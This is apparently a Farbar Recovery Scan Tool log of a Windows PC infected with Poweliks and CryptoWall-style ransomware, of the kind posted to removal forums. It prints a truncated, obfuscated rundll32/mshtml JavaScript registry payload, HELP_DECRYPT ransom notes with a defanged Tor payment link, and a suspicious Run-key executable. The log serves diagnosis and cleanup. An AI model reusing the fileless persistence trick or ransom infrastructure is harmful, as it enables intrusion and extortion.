HKU\S-1-5-21-1427692388-1042374531-2795145444-1001\...\Run: [dccwmote] => C:\Users\Dorothy01\AppData\Local\Temp\getmhost.exe [406016 2015-02-21] () <===== ATTENTION
HKU\S-1-5-21-1427692388-1042374531-2795145444-1001\...\Run: [BluetoothS] => rundll32.exe "%appdata%\BtvStack.dll",BTHF_Register
HKU\S-1-5-21-1427692388-1042374531-2795145444-1001\...\MountPoints2: {5042c0a6-b247-11e4-bed4-089e013a632b} - "G:\AutoRun.exe" 
HKU\S-1-5-21-1427692388-1042374531-2795145444-1001\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf> (the data entry has 243 more characters). <==== Poweliks!
Startup: C:\Users\Dorothy01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HELP_DECRYPT.HTML ()
Startup: C:\Users\Dorothy01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HELP_DECRYPT.PNG ()
Startup: C:\Users\Dorothy01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HELP_DECRYPT.TXT ()
InternetURL: C:\Users\Dorothy01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HELP_DECRYPT.URL -> hxxp://paytoc4gtpn5czl2.torconnectpaycom/1msme5i
ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVAST Software\Avast\ashShA64.dll (AVAST Software)
 
==================== Internet (Whitelisted) ====================
 
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
 
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://g.msn.com/HPDSK13/1
HKU\S-1-5-21-1427692388-1042374531-2795145444-1001\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = http://www.msn.com/?ocid=iehp
SearchScopes: HKLM-x32 -> {8E0E081D-FD81-46C2-AD92-3B939C17F151} URL = http://www.amazon.co...s={searchTerms}
SearchScopes: HKLM-x32 -> {b7fca997-d0fb-4fe0-8afd-255e89cf9671} URL = http://search.yahoo....psg&type=HPDTDF
SearchScopes: HKU\.DEFAULT -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
SearchScopes: HKU\S-1-5-19 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
SearchScopes: HKU\S-1-5-20 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
BHO: No Name -> {7F96F190-09C4-4BEC-B7FB-A9E26151EAB0}} ->  No File
BHO: No Name -> {AA58ED58-01DD-4d91-8333-CF10577473F7} ->  No File
BHO-x32: Norton Identity Protection -> {602ADB0E-4AFF-4217-8AA1-95DAC4DFA408} -> C:\Program Files (x86)\Norton Internet Security\Engine\20.6.0.27\coIEPlg.dll (Symantec Corporation)
BHO-x32: Norton Vulnerability Protection -> {6D53EC84-6AAE-4787-AEEE-F4628F01010C} -> C:\Program Files (x86)\Norton Internet Security\Engine\20.6.0.27\IPS\IPSBHO.DLL (Symantec Corporation)
BHO-x32: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_31\bin\ssv.dll (Oracle Corporation)
BHO-x32: No Name -> {7F96F190-09C4-4BEC-B7FB-A9E26151EAB0}} ->  No File
BHO-x32: Google Toolbar Helper -> {AA58ED58-01DD-4d91-8333-CF10577473F7} -> C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll (Google Inc.)
BHO-x32: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_31\bin\jp2ssv.dll (Oracle Corporation)
BHO-x32: HP Network Check Helper -> {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} -> C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPlugin.dll (Hewlett-Packard)
Toolbar: HKLM - No Name - {2318C2B1-4965-11d4-9B18-009027A5CD4F} -  No File
Toolbar: HKLM-x32 - Norton Toolbar - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - C:\Program Files (x86)\Norton Internet Security\Engine\20.6.0.27\coIEPlg.dll (Symantec Corporation)
Toolbar: HKLM-x32 - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll (Google Inc.)
Toolbar: HKU\.DEFAULT -> No Name - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} -  No File
Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
Tcpip\Parameters: [DhcpNameServer] 192.168.1.254
Tcpip\..\Interfaces\{0C5C3F02-879E-42E8-8113-9C0FA649DB90}: [NameServer] 8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8
Tcpip\..\Interfaces\{462105B1-AF78-47E3-AC0D-109F28027A93}: [NameServer] 8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8
Tcpip\..\Interfaces\{8718928D-CBEB-45EA-A621-800A9249001D}: [NameServer] 8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8
Tcpip\..\Interfaces\{9B004C7D-7A34-4A9C-BEDB-5212A582FAB1}: [NameServer] 8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8
Tcpip\..\Interfaces\{D24FA36B-6CD5-4603-8F72-73AC28D99F5B}: [NameServer] 8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8
 
FireFox:
========
FF Plugin-x32: @Apple.com/iTunes,version=1.0 -> C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll ()
FF Plugin-x32: @java.com/DTPlugin,version=11.31.2 -> C:\Program Files (x86)\Java\jre1.8.0_31\bin\dtplugin\npDeployJava1.dll (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.31.2 -> C:\Program Files (x86)\Java\jre1.8.0_31\bin\plugin2\npjp2.dll (Oracle Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3502.0922 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3555.0308 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.26.9\npGoogleUpdate3.dll (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.26.9\npGoogleUpdate3.dll (Google Inc.)
FF Plugin-x32: @WildTangent.com/GamesAppPresenceDetector,Version=1.0 -> C:\Program Files (x86)\WildTangent Games\App\BrowserIntegration\Registered\0\NP_wtapp.dll ()
FF HKLM-x32\...\Firefox\Extensions: [{BBDA0591-3099-440a-AA10-41764D9DB4DB}] - C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\NIS_20.0.0.136\IPSFF
FF Extension: Norton Vulnerability Protection - C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\NIS_20.0.0.136\IPSFF [2014-07-23]
FF HKLM-x32\...\Firefox\Extensions: [{2D3F3651-74B9-4795-BDEC-6DA2F431CB62}] - C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\NIS_20.0.0.136\coFFPlgn
FF Extension: Norton Toolbar - C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\NIS_20.0.0.136\coFFPlgn [2015-02-20]
 
Chrome: 
=======
CHR StartupUrls: Default -> "hxxp://www.google.com/"
CHR Profile: C:\Users\Dorothy01\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Google Slides) - C:\Users\Dorothy01\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2015-02-19]
CHR Extension: (Google Docs) - C:\Users\Dorothy01\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2015-02-19]
CHR Extension: (Google Drive) - C:\Users\Dorothy01\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2015-02-19]
CHR Extension: (Google Voice Search Hotword (Beta)) - C:\Users\Dorothy01\AppData\Local\Google\Chrome\User Data\Default\Extensions\bepbmhgboaologfdajaanbcjmnhjmhfn [2015-02-19]
CHR Extension: (YouTube) - C:\Users\Dorothy01\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-02-19]
CHR Extension: (Google Search) - C:\Users\Dorothy01\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-02-19]
CHR Extension: (Google Sheets) - C:\Users\Dorothy01\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2015-02-19]
CHR Extension: (Norton Identity Safe) - C:\Users\Dorothy01\AppData\Local\Google\Chrome\User Data\Default\Extensions\iikflkcanblccfahdhdonehdalibjnif [2015-02-19]
CHR Extension: (Google Wallet) - C:\Users\Dorothy01\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2015-02-19]
CHR Extension: (Gmail) - C:\Users\Dorothy01\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-02-19]
CHR HKLM\...\Chrome\Extension: [bejnhdlplbjhffionohbdnpcbobfejcc] - C:\Program Files (x86)\Norton Internet Security\Engine\20.6.0.27\Exts\Chrome.crx [2014-12-09]
CHR HKLM\...\Chrome\Extension: [iikflkcanblccfahdhdonehdalibjnif] - https://clients2.goo...ice/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [bejnhdlplbjhffionohbdnpcbobfejcc] - C:\Program Files (x86)\Norton Internet Security\Engine\20.6.0.27\Exts\Chrome.crx [2014-12-09]
CHR HKLM-x32\...\Chrome\Extension: [iikflkcanblccfahdhdonehdalibjnif] - https://clients2.goo...ice/update2/crx
 
==================== Services (Whitelisted) =================
 
(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)
 
R2 AMD FUEL Service; C:\Program Files\ATI Technologies\ATI.ACE\Fuel\Fuel.Service.exe [344064 2014-07-04] (Advanced Micro Devices, Inc.) [File not signed]
R2 avast! Antivirus; C:\Program Files\AVAST Software\Avast\AvastSvc.exe [50344 2015-02-19] (AVAST Software)
R2 HP Support Assistant Service; C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\hpsa_service.exe [85504 2012-08-15] (Hewlett-Packard Company) [File not signed]
R2 HPConnectedRemote; c:\Program Files (x86)\Hewlett-Packard\HP Connected Remote\HPConnectedRemoteService.exe [35232 2012-07-19] (Hewlett-Packard)
R2 IconMan_R; C:\Program Files (x86)\Realtek\Realtek PCIE Card Reader\RIconMan.exe [2451456 2012-07-13] (Realsil Microelectronics Inc.) [File not signed]
R2 NIS; C:\Program Files (x86)\Norton Internet Security\Engine\20.6.0.27\ccSvcHst.exe [144368 2013-05-20] (Symantec Corporation)
S3 w3logsvc; C:\Windows\system32\inetsrv\w3logsvc.dll [76800 2014-10-14] (Microsoft Corporation)
S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [347880 2014-09-24] (Microsoft Corporation)
S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [23824 2014-09-24] (Microsoft Corporation)
 
==================== Drivers (Whitelisted) ====================
 
(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)
 
R2 aswHwid; C:\Windows\system32\drivers\aswHwid.sys [29208 2015-02-19] ()
R2 aswMonFlt; C:\Windows\system32\drivers\aswMonFlt.sys [83280 2015-02-19] (AVAST Software)
R0 aswRvrt; C:\Windows\System32\Drivers\aswRvrt.sys [65776 2015-02-19] ()
R1 aswSnx; C:\Windows\system32\drivers\aswSnx.sys [1050432 2015-02-19] (AVAST Software)
R1 aswSP; C:\Windows\system32\drivers\aswSP.sys [436624 2015-02-19] (AVAST Software)
R0 aswVmm; C:\Windows\System32\Drivers\aswVmm.sys [267632 2015-02-19] ()
R3 BHDrvx64; C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\NIS_20.0.0.136\Definitions\BASHDefs\20140912.003\BHDrvx64.sys [1586904 2014-09-12] (Symantec Corporation)
S3 BS1924802738; C:\Users\Dorothy01\AppData\Local\Temp\NTFS.sys [13192 2015-02-21] (Sysinternals) [File not signed]
R3 ccSet_NIS; C:\Windows\system32\drivers\NISx64\1406000.01B\ccSetx64.sys [169048 2013-04-15] (Symantec Corporation)
R1 CLVirtualDrive; C:\Windows\system32\DRIVERS\CLVirtualDrive.sys [92536 2012-06-25] (CyberLink)
R3 eeCtrl; C:\Program Files (x86)\Common Files\Symantec Shared\EENGINE\eeCtrl64.sys [487216 2014-09-09] (Symantec Corporation)
R3 EraserUtilRebootDrv; C:\Program Files (x86)\Common Files\Symantec Shared\EENGINE\EraserUtilRebootDrv.sys [142640 2014-09-09] (Symantec Corporation)
R3 IDSVia64; C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\NIS_20.0.0.136\Definitions\IPSDefs\20140919.001\IDSvia64.sys [633560 2014-08-29] (Symantec Corporation)
S3 massfilter_hs; C:\WINDOWS\system32\drivers\massfilter_hs.sys [20232 2012-06-20] (HandSet Incorporated)
S3 MBAMSwissArmy; C:\WINDOWS\system32\drivers\MBAMSwissArmy.sys [129752 2015-02-19] (Malwarebytes Corporation)
S3 NAVENG; C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\NIS_20.0.0.136\Definitions\VirusDefs\20140920.001\ENG64.SYS [129752 2014-09-01] (Symantec Corporation)
S3 NAVEX15; C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\NIS_20.0.0.136\Definitions\VirusDefs\20140920.001\EX64.SYS [2137304 2014-09-01] (Symantec Corporation)
S3 SRTSP; C:\Windows\System32\Drivers\NISx64\1406000.01B\SRTSP64.SYS [796760 2013-05-15] (Symantec Corporation)
R3 SRTSPX; C:\Windows\system32\drivers\NISx64\1406000.01B\SRTSPX64.SYS [36952 2013-03-04] (Symantec Corporation)
R3 SymDS; C:\Windows\system32\drivers\NISx64\1406000.01B\SYMDS64.SYS [493656 2013-05-20] (Symantec Corporation)
R3 SymEFA; C:\Windows\system32\drivers\NISx64\1406000.01B\SYMEFA64.SYS [1139800 2013-05-22] (Symantec Corporation)
S4 SymELAM; C:\Windows\system32\drivers\NISx64\1406000.01B\SymELAM.sys [23448 2012-06-20] (Symantec Corporation)
R3 SymEvent; C:\windows\system32\Drivers\SYMEVENT64x86.SYS [177312 2014-07-23] (Symantec Corporation)
R3 SymIRON; C:\Windows\system32\drivers\NISx64\1406000.01B\Ironx64.SYS [224416 2013-03-04] (Symantec Corporation)
R3 SymNetS; C:\Windows\System32\Drivers\NISx64\1406000.01B\SYMNETS.SYS [433752 2013-04-24] (Symantec Corporation)
U3 TrueSight; C:\Windows\System32\drivers\TrueSight.sys [37624 2015-02-20] ()
S3 WdNisDrv; C:\Windows\System32\Drivers\WdNisDrv.sys [123224 2014-09-24] (Microsoft Corporation)
 
==================== NetSvcs (Whitelisted) ===================
 
(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)
 
 
==================== One Month Created Files and Folders ========
 
(If an entry is included in the fixlist, the file\folder will be moved.)
 
2015-02-21 22:39 - 2015-02-21 22:40 - 00018356 _____ () C:\Users\Dorothy01\Desktop\FRST.txt
2015-02-21 22:39 - 2015-02-21 22:40 - 00000000 ____D () C:\FRST
2015-02-21 22:38 - 2015-02-21 22:38 - 00000383 _____ () C:\Users\Dorothy01\Desktop\idtool.txt
2015-02-21 22:24 - 2015-02-21 22:24 - 00008630 _____ () C:\Users\Dorothy01\HELP_DECRYPT.HTML
2015-02-21 22:24 - 2015-02-21 22:24 - 00008630 _____ () C:\Users\Dorothy01\Downloads\HELP_DECRYPT.HTML
2015-02-21 22:24 - 2015-02-21 22:24 - 00008630 _____ () C:\Users\Dorothy01\Desktop\HELP_DECRYPT.HTML
2015-02-21 22:24 - 2015-02-21 22:24 - 00004258 _____ () C:\Users\Dorothy01\HELP_DECRYPT.TXT
2015-02-21 22:24 - 2015-02-21 22:24 - 00004258 _____ () C:\Users\Dorothy01\Downloads\HELP_DECRYPT.TXT
2015-02-21 22:24 - 2015-02-21 22:24 - 00004258 _____ () C:\Users\Dorothy01\Desktop\HELP_DECRYPT.TXT
2015-02-21 22:24 - 2015-02-21 22:24 - 00000292 _____ () C:\Users\Dorothy01\HELP_DECRYPT.URL
2015-02-21 22:24 - 2015-02-21 22:24 - 00000292 _____ () C:\Users\Dorothy01\Downloads\HELP_DECRYPT.URL
2015-02-21 22:24 - 2015-02-21 22:24 - 00000292 _____ () C:\Users\Dorothy01\Desktop\HELP_DECRYPT.URL
2015-02-21 22:15 - 2015-02-21 22:15 - 02086912 _____ (Farbar) C:\Users\Dorothy01\Desktop\FRST64.exe
2015-02-21 22:12 - 2015-02-21 22:12 - 02745248 _____ () C:\Users\Dorothy01\Downloads\idtool.zip
2015-02-21 19:12 - 2015-02-21 19:12 - 00101120 _____ () C:\Users\Dorothy01\Downloads\Extras.Txt
2015-02-21 19:07 - 2015-02-21 19:14 - 00137792 _____ () C:\Users\Dorothy01\Downloads\OTL.Txt
2015-02-21 18:42 - 2015-02-21 18:42 - 00602112 _____ (OldTimer Tools) C:\Users\Dorothy01\Downloads\OTL.exe
2015-02-21 18:33 - 2015-02-21 18:33 - 00001616 _____ () C:\WINDOWS\PFRO.log
2015-02-21 03:30 - 2015-02-21 03:30 - 00023552 _____ () C:\Users\Dorothy01\AppData\Local\pgkunge.dll
2015-02-20 19:35 - 2015-02-20 19:35 - 02347384 _____ (ESET) C:\Users\Dorothy01\Downloads\esetsmartinstaller_enu.exe
2015-02-20 19:35 - 2015-02-20 19:35 - 02347384 _____ (ESET) C:\Users\Dorothy01\Downloads\esetsmartinstaller_enu (1).exe
2015-02-20 19:33 - 2015-02-20 19:33 - 00190152 _____ (ESET) C:\Users\Dorothy01\Downloads\ESETPoweliksCleaner (2).exe
2015-02-20 19:33 - 2015-02-20 19:33 - 00190152 _____ (ESET) C:\Users\Dorothy01\Downloads\ESETPoweliksCleaner (1).exe
2015-02-20 19:33 - 2015-02-20 19:33 - 00002814 _____ () C:\Users\Dorothy01\Downloads\ESETPoweliksCleaner (1).exe_20150220.193324.1664.log
2015-02-20 06:45 - 2015-02-21 22:40 - 00000000 ____D () C:\Users\Dorothy01\AppData\Local\CrashDumps
2015-02-20 06:41 - 2015-02-20 18:46 - 00000922 _____ () C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job
2015-02-20 06:41 - 2015-02-20 06:41 - 00003894 _____ () C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineUA
2015-02-20 06:41 - 2015-02-20 06:41 - 00003658 _____ () C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineCore
2015-02-20 06:07 - 2015-02-20 19:18 - 00037624 _____ () C:\WINDOWS\system32\Drivers\TrueSight.sys
2015-02-20 06:07 - 2015-02-20 06:07 - 00000000 ____D () C:\ProgramData\RogueKiller
2015-02-19 22:07 - 2015-02-19 22:09 - 18683992 _____ () C:\Users\Dorothy01\Downloads\RogueKillerX64.exe
2015-02-19 22:04 - 2015-02-19 22:04 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\AVAST Software
2015-02-19 21:41 - 2015-02-19 21:41 - 00002814 _____ () C:\Users\Dorothy01\Downloads\ESETPoweliksCleaner.exe_20150219.214114.592.log
2015-02-19 21:33 - 2015-02-21 03:14 - 00000000 ____D () C:\AdwCleaner
2015-02-19 21:33 - 2015-02-19 21:33 - 00002814 _____ () C:\Users\Dorothy01\Downloads\ESETPoweliksCleaner.exe_20150219.213330.1188.log
2015-02-19 21:33 - 2015-02-19 21:33 - 00002814 _____ () C:\Users\Dorothy01\Downloads\ESETPoweliksCleaner.exe_20150219.213304.1212.log
2015-02-19 21:32 - 2015-02-19 21:33 - 02126848 _____ () C:\Users\Dorothy01\Downloads\adwcleaner_4.111.exe
2015-02-19 21:32 - 2015-02-19 21:32 - 00190152 _____ (ESET) C:\Users\Dorothy01\Downloads\ESETPoweliksCleaner.exe
2015-02-19 21:32 - 2015-02-19 21:32 - 00002814 _____ () C:\Users\Dorothy01\Downloads\ESETPoweliksCleaner.exe_20150219.213253.1128.log
2015-02-19 21:27 - 2015-02-19 21:27 - 00001982 _____ () C:\Users\Public\Desktop\Avast Free Antivirus.lnk
2015-02-19 21:27 - 2015-02-19 21:27 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AVAST Software
2015-02-19 21:27 - 2015-02-19 21:17 - 00364512 _____ (AVAST Software) C:\WINDOWS\system32\aswBoot.exe
2015-02-19 21:23 - 2015-02-19 21:23 - 05006864 _____ (AVAST Software) C:\Users\Dorothy01\Downloads\avast_free_antivirus_setup_online.exe
2015-02-19 21:20 - 2015-02-19 21:27 - 00000350 ____H () C:\WINDOWS\Tasks\avast! Emergency Update.job
2015-02-19 21:20 - 2015-02-19 21:20 - 00002281 _____ () C:\Users\Public\Desktop\Google Chrome.lnk
2015-02-19 21:20 - 2015-02-19 21:20 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome
2015-02-19 21:20 - 2015-02-19 21:20 - 00000000 ____D () C:\ProgramData\Google
2015-02-19 21:20 - 2015-02-19 21:20 - 00000000 ____D () C:\Program Files\Google
2015-02-19 21:18 - 2015-02-21 22:34 - 00000918 _____ () C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job
2015-02-19 21:18 - 2015-02-19 21:21 - 00000000 ____D () C:\Users\Dorothy01\AppData\Local\Google
2015-02-19 21:18 - 2015-02-19 21:20 - 00000000 ____D () C:\Program Files (x86)\Google
2015-02-19 21:17 - 2015-02-19 21:27 - 01050432 _____ (AVAST Software) C:\WINDOWS\system32\Drivers\aswsnx.sys
2015-02-19 21:17 - 2015-02-19 21:27 - 00083280 _____ (AVAST Software) C:\WINDOWS\system32\Drivers\aswmonflt.sys
2015-02-19 21:17 - 2015-02-19 21:17 - 00436624 _____ (AVAST Software) C:\WINDOWS\system32\Drivers\aswSP.sys
2015-02-19 21:17 - 2015-02-19 21:17 - 00267632 _____ () C:\WINDOWS\system32\Drivers\aswVmm.sys
2015-02-19 21:17 - 2015-02-19 21:17 - 00065776 _____ () C:\WINDOWS\system32\Drivers\aswRvrt.sys
2015-02-19 21:17 - 2015-02-19 21:17 - 00043152 _____ (AVAST Software) C:\WINDOWS\avastSS.scr
2015-02-19 21:17 - 2015-02-19 21:17 - 00029208 _____ () C:\WINDOWS\system32\Drivers\aswHwid.sys
2015-02-19 21:15 - 2015-02-19 21:15 - 00000000 ____D () C:\ProgramData\AVAST Software
2015-02-19 21:15 - 2015-02-19 21:15 - 00000000 ____D () C:\Program Files\AVAST Software
2015-02-19 21:13 - 2015-02-19 21:14 - 00000000 ____D () C:\Program Files (x86)\Mozilla Firefox
2015-02-19 21:10 - 2015-02-21 03:14 - 00000292 _____ () C:\HELP_DECRYPT.URL
2015-02-19 21:07 - 2015-02-19 21:07 - 00023552 _____ () C:\Users\Dorothy01\AppData\Local\pckunie.dll
2015-02-19 18:15 - 2015-02-19 18:15 - 00003180 _____ () C:\WINDOWS\SysWOW64\InstallUtil.InstallLog
2015-02-18 16:53 - 2015-02-19 21:49 - 00129752 _____ (Malwarebytes Corporation) C:\WINDOWS\system32\Drivers\MBAMSwissArmy.sys
2015-02-18 16:52 - 2015-02-18 16:52 - 00001120 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2015-02-18 16:52 - 2015-02-18 16:52 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2015-02-18 16:52 - 2015-02-18 16:52 - 00000000 ____D () C:\ProgramData\Malwarebytes
2015-02-18 16:52 - 2015-02-18 16:52 - 00000000 ____D () C:\Program Files (x86)\Malwarebytes Anti-Malware
2015-02-18 16:52 - 2014-11-21 06:14 - 00093400 _____ (Malwarebytes Corporation) C:\WINDOWS\system32\Drivers\mbamchameleon.sys
2015-02-18 16:52 - 2014-11-21 06:14 - 00064216 _____ (Malwarebytes Corporation) C:\WINDOWS\system32\Drivers\mwac.sys
2015-02-18 16:52 - 2014-11-21 06:14 - 00025816 _____ (Malwarebytes Corporation) C:\WINDOWS\system32\Drivers\mbam.sys
2015-02-18 16:48 - 2015-02-18 16:48 - 00000836 _____ () C:\Users\Public\Desktop\CCleaner.lnk
2015-02-18 16:48 - 2015-02-18 16:48 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CCleaner
2015-02-18 16:48 - 2015-02-18 16:48 - 00000000 ____D () C:\Program Files\CCleaner
2015-02-18 16:39 - 2015-02-21 22:17 - 00000000 ____D () C:\WINDOWS\pss
2015-02-11 17:53 - 2015-02-11 17:53 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ZTE Handset USB Driver
2015-02-11 17:53 - 2015-02-11 17:53 - 00000000 ____D () C:\Program Files\ZTE_Handset_USB_Driver
2015-02-11 17:53 - 2013-09-11 16:27 - 00134976 _____ (ZTE Corporation) C:\WINDOWS\system32\Drivers\zghsser.sys
2015-02-11 17:53 - 2013-09-11 16:26 - 00175808 _____ (ZTE Corporation) C:\WINDOWS\system32\Drivers\zghsnet.sys
2015-02-11 17:53 - 2013-03-19 18:38 - 00821544 _____ () C:\WINDOWS\adb.exe
2015-02-11 17:53 - 2012-11-09 17:14 - 00062728 _____ (VIA Telecom) C:\WINDOWS\system32\Drivers\viahsser.sys
2015-02-11 17:53 - 2012-10-31 18:02 - 00032136 _____ (Via Telecom, Inc.) C:\WINDOWS\system32\Drivers\viahsets.sys
2015-02-11 17:53 - 2012-06-20 13:51 - 00020232 _____ (HandSet Incorporated) C:\WINDOWS\system32\Drivers\massfilter_hs.sys
2015-02-11 17:53 - 2012-06-08 16:56 - 01721576 _____ () C:\WINDOWS\system32\WdfCoInstaller01009.dll
2015-02-11 17:53 - 2012-06-08 16:56 - 01002728 _____ () C:\WINDOWS\system32\WinUSBCoInstaller2.dll
2015-02-11 17:53 - 2011-10-26 17:31 - 00067608 _____ (Google, inc) C:\WINDOWS\AdbWinUsbApi.dll
2015-02-11 17:53 - 2011-08-15 18:43 - 00102936 _____ (Google, inc) C:\WINDOWS\AdbWinApi.dll
2015-02-09 16:56 - 2015-02-09 16:56 - 00000000 ____H () C:\WINDOWS\system32\Drivers\Msft_User_WpdMtpDr_01_11_00.Wdf
2015-01-24 16:45 - 2015-02-19 07:41 - 00000000 ____D () C:\Users\Dorothy01\AppData\Local\{294523ef-b8b6-59cc-fe37-7cd365b2a599}
2015-01-22 10:52 - 2015-01-22 10:52 - 00003296 ____N () C:\bootsqm.dat
 
==================== One Month Modified Files and Folders =======
 
(If an entry is included in the fixlist, the file\folder will be moved.)
 
2015-02-21 22:38 - 2014-07-23 09:19 - 00003598 _____ () C:\WINDOWS\System32\Tasks\Optimize Start Menu Cache Files-S-1-5-21-1427692388-1042374531-2795145444-1001
2015-02-21 22:37 - 2014-09-24 01:15 - 00006428 _____ () C:\WINDOWS\system32\PerfStringBackup.INI
2015-02-21 22:33 - 2014-12-09 19:03 - 00000000 ___HD () C:\ProgramData\{F66CB4EE-546F-4D54-9332-216DE189AAB0}
2015-02-21 22:33 - 2014-10-14 09:44 - 00000000 ____D () C:\Users\Dorothy01
2015-02-21 22:31 - 2012-08-31 22:56 - 00000000 ____D () C:\ProgramData\Hewlett-Packard
2015-02-21 22:30 - 2013-08-22 09:36 - 00000000 ____D () C:\WINDOWS\system32\sru
2015-02-21 22:28 - 2013-08-22 08:45 - 00000006 ____H () C:\WINDOWS\Tasks\SA.DAT
2015-02-21 22:13 - 2014-10-23 11:14 - 04012982 _____ (NathanScott Apps) C:\Users\Dorothy01\Desktop\IDTool.exe
2015-02-21 19:37 - 2013-08-22 07:25 - 01048576 ___SH () C:\WINDOWS\system32\config\BBI
2015-02-21 03:31 - 2014-11-11 19:11 - 00000761 _____ () C:\WINDOWS\system32\Drivers\etc\hosts.txt
2015-02-21 03:14 - 2014-07-23 16:07 - 00000000 ____D () C:\StarmIRC v3.0
2015-02-21 03:14 - 2014-07-23 16:05 - 00000000 ____D () C:\StarPircH
2015-02-21 03:14 - 2012-08-01 21:15 - 00000000 ____D () C:\SWSETUP
2015-02-21 03:14 - 2012-08-01 03:57 - 00000000 _RSHD () C:\SYSTEM.SAV
2015-02-20 06:09 - 2014-07-23 16:00 - 00000000 ____D () C:\ProgramData\Oracle
